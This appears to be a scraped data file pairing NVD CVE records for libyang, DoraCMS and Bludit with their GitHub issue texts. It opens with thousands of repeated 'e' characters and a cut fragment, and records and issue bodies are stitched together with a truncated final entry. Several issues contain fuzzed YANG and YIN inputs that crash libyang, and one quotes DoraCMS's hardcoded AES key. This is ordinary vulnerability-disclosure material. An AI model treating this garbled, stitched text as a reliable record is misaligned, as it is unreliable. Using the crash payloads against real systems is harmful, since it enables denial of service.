eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeVeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee[eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeemeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeentifier"> :rre-instance value="false"/> </type> </leaf> <leaf name="link-req"> <type name="instance-identifies"/> </leaf> <list name="Darget"> <key value="id"/> <leaf name="id"> <type name="uint8"/> </leaf> <leaf name="name"> <type name="string"/> </leaf> </list> </container> </module> ```
In function "read_yin_container", the value "retval->ext[r]" can be NULL. The operation "retval->ext[r]->flags" result in a crash
https://api.github.com/repos/CESNET/libyang/issues/1454/comments
2
2021-03-08T11:34:27Z
2022-05-31T09:40:09Z
https://github.com/CESNET/libyang/issues/1454
824,473,349
1,454
1,978
CVE-2021-28903
2021-05-20T19:15:07.637
A stack overflow in libyang <= v1.0.225 can cause a denial of service through function lyxml_parse_mem(). lyxml_parse_elem() function will be called recursively, which will consume stack space and lead to crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1453" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202107-54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1453" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202107-54" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:*:*:*:*:*:*:*:*", "matchCriteriaId": "6CFE711D-6C8F-4F0F-B53E-BB952DC1FF39", "versionEndExcluding": null, "versionEndIncluding": "1.0.225", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/CESNET/libyang/issues/1453
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
null
The Recursive call of "lyxml_parse_elem" leads to crash
https://api.github.com/repos/CESNET/libyang/issues/1453/comments
13
2021-03-08T07:25:01Z
2022-05-31T09:40:01Z
https://github.com/CESNET/libyang/issues/1453
824,265,116
1,453
1,979
CVE-2021-28904
2021-05-20T19:15:07.673
In function ext_get_plugin() in libyang <= v1.0.225, it doesn't check whether the value of revision is NULL. If revision is NULL, the operation of strcmp(revision, ext_plugins[u].revision) will lead to a crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1451" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202107-54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1451" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202107-54" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:*:*:*:*:*:*:*:*", "matchCriteriaId": "6CFE711D-6C8F-4F0F-B53E-BB952DC1FF39", "versionEndExcluding": null, "versionEndIncluding": "1.0.225", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "252" ]
252
https://github.com/CESNET/libyang/issues/1451
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
The argument "revision" of function ext_get_plugin can be NULL, which can cause crash in the strcmp. lys_parse_path(ctx, file, LYS_IN_YANG); payload: ```yang module ietf-restconf { yang-version 1.1; namespace "ang:ietff"; prefix "rc"; organization "up";extension yang-data { argument name { yin-element true; } description "Initial revision."; reference "RFC 8040: RESTCONF Protocol."; } extension ya{ argument name { yin-element true; } descriptGon "This extension is used to spdentity values foQ any 'identityref' leaf or contact "WG Web: Note that the YANG definitions within this module do nepresent configuration data of any kind. The 'restconf-media-type' YANG extension statement provides a normative syntax for XML and JSON message-encoding purposes. Copyright (c) 2017 IETF Trust and thV persons identified as autho_s of t`e code. All rights reserved.ovisions Relating to IETF Documentw (http://trustee.ietf.org/license-info). This version of thys YANG module is part o] RFC 8040; see the RFC itself for full legal notices."; revision 2017-01-26 { description "Initial revision."; reference "RFC 8040: RESTCONF Protocol."; } extension yang-data { argument name { yin-element true; } description "Initial revision."; reference "RFC 8040: RESTCONF Protoco."; } extension ya{ argument name { yin-element true; } description "This extension is used to spdentity values foQ any 'identityref' leaf or leaf-list nodes are limited to the module containinion statemen€and the modules importe040: RESTCONF ocol."; } extension yang-data { ```
“ext_get_plugin” function cause crash
https://api.github.com/repos/CESNET/libyang/issues/1451/comments
2
2021-03-08T02:03:57Z
2021-05-25T06:46:49Z
https://github.com/CESNET/libyang/issues/1451
824,098,593
1,451
1,980
CVE-2021-28905
2021-05-20T19:15:07.710
In function lys_node_free() in libyang <= v1.0.225, it asserts that the value of node->module can't be NULL. But in some cases, node->module can be null, which triggers a reachable assertion (CWE-617).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1452" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202107-54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1452" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202107-54" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:*:*:*:*:*:*:*:*", "matchCriteriaId": "6CFE711D-6C8F-4F0F-B53E-BB952DC1FF39", "versionEndExcluding": null, "versionEndIncluding": "1.0.225", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/CESNET/libyang/issues/1452
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
lys_parse_path(ctx, file, LYS_IN_YIN); payload: ```xml <?xm?> <module xmlns="urn:ietf:params:xml:ns:yang:yin:1" xmlns:m="urn:libyang:tests:mandatory" name="mandatory"> <yang-version value="1"/> <namespace uri="urn:libyang:tests:mandatory"/> <prefix value="m"/> <revision date="2016-04-11"> <description> <text>Initial revision.</text> </description> </revision> <grouping name="group2"> <leaf name="leaf6"> <type name="empty"/> <mandatory value="true"/> </leaf> </grouping> <grouping name="group1"> <uses namd="group2"/> </grouping> <container name="top"> <leaf name="obsolete"> <type name="strixg"/> <status value="obsolete"/> <mandatory value="true"/> </leaf> <leaf name="obsolet|-inherited"> <type name="string"/> <mandatory value="true"/> </leaf> </container> </module> ```
“lys_node_free” function's arg node->module can be NULL, which leads to assert.
https://api.github.com/repos/CESNET/libyang/issues/1452/comments
2
2021-03-08T03:16:06Z
2021-05-25T06:48:19Z
https://github.com/CESNET/libyang/issues/1452
824,124,910
1,452
1,981
CVE-2021-28906
2021-05-20T19:15:07.747
In function read_yin_leaf() in libyang <= v1.0.225, it doesn't check whether the value of retval->ext[r] is NULL. In some cases, it can be NULL, which leads to the operation of retval->ext[r]->flags that results in a crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1455" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202107-54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1455" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202107-54" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:*:*:*:*:*:*:*:*", "matchCriteriaId": "6CFE711D-6C8F-4F0F-B53E-BB952DC1FF39", "versionEndExcluding": null, "versionEndIncluding": "1.0.225", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "252" ]
252
https://github.com/CESNET/libyang/issues/1455
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
``` <?xml version="1.0" encoding="UTF-8"?> <module name="empnt" xmlns="urn:ietf:params:xml:ns:yang:yin:1" ec="urn:libyang:tests:emptycont"> <yang-version value="1"/> <namespace uri="urn:libyag:tests:emptycont"/> <prefix value="eh"/> <revision date="2016-03-18"> <description> <text>initial revision</text> </description> </revision> <leaf name="tZpleaf"> <type name="string"/> </leaf> <container name="top"> <leaf name="a"> <type name= "string"/> </leaf> <container name="b"> <when condition="../../topleag"/> <leaf name="b1"> <when condition="../. < / * / " xmlns="urn:ietf:params:xml 4 d | ./a"/> <type name="string"/> </leaf> </container> <container name="R"> <presence value="test"/> <leaf name="c1"> <when condition="../.*/a"/> <type name="string"/> </leaf> </container> </container> </module> ```
In function "read_yin_leaf", the value "retval->ext[r]" can be NULL. The operation "retval->ext[r]->flags" result in a crash
https://api.github.com/repos/CESNET/libyang/issues/1455/comments
2
2021-03-08T11:35:21Z
2022-05-31T09:40:15Z
https://github.com/CESNET/libyang/issues/1455
824,473,993
1,455
1,982
CVE-2020-18220
2021-05-20T20:15:07.270
Weak Encoding for Password in DoraCMS v2.1.1 and earlier allows attackers to obtain sensitive information as it does not use a random salt or IV for its AES-CBC encryption, causes password encrypted for users to be susceptible to dictionary attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/doramart/DoraCMS/issues/190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/doramart/DoraCMS/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:html-js:doracms:*:*:*:*:*:*:*:*", "matchCriteriaId": "3A984FD0-3602-4BB6-AD05-CF00D7208D99", "versionEndExcluding": null, "versionEndIncluding": "2.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "326" ]
326
https://github.com/doramart/DoraCMS/issues/190
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "doramart", "DoraCMS" ]
Application uses static key when performing encryption which makes it easier for an attacker to conduct brute force password guessing. ``` Affected URL: https://github.com/doramart/DoraCMS/blob/9fee40914eccfd06dc225ebdd3e7c4bff0be799f/server/lib/utils/crypto.js const AESkey = "doracms_"; const MD5key = "dora"; export default { AES: { encrypt: (message) => {//加密 return CryptoJS.AES.encrypt(message, AESkey, { mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7 }).toString(); }, ``` ``` Affected URL: https://github.com/doramart/DoraCMS/blob/9fee40914eccfd06dc225ebdd3e7c4bff0be799f/server/lib/controller/user.js if (fields.password) { userObj.password = service.encrypt(fields.password, settings.encrypt_key); } ``` ``` Solution usage of a random salt : this.encrypt = function(message, password) { var salt = forge.random.getBytesSync(128); var key = forge.pkcs5.pbkdf2(password, salt, 4, 16); var iv = forge.random.getBytesSync(16); var cipher = forge.cipher.createCipher('AES-CBC', key); cipher.start({iv: iv}); cipher.update(forge.util.createBuffer(message)); cipher.finish(); var cipherText = forge.util.encode64(cipher.output.getBytes()); return {cipher_text: cipherText, salt: forge.util.encode64(salt), iv: forge.util.encode64(iv)}; } ``` Source https://auth0.com/blog/adding-salt-to-hashing-a-better-way-to-store-passwords/ https://www.thepolyglotdeveloper.com/2014/10/implement-aes-strength-encryption-javascript/ https://cwe.mitre.org/data/definitions/329.html
Hardcoded-key vulnerability usage of static salt
https://api.github.com/repos/doramart/DoraCMS/issues/190/comments
1
2019-02-19T18:17:06Z
2019-02-22T08:30:49Z
https://github.com/doramart/DoraCMS/issues/190
412,059,310
190
1,983
CVE-2020-23765
2021-05-21T18:15:07.893
A file upload vulnerability was discovered in the file path /bl-plugins/backup/plugin.php on Bludit version 3.12.0. If an attacker is able to gain Administrator rights they will be able to use unsafe plugins to upload a backup file and control the server.
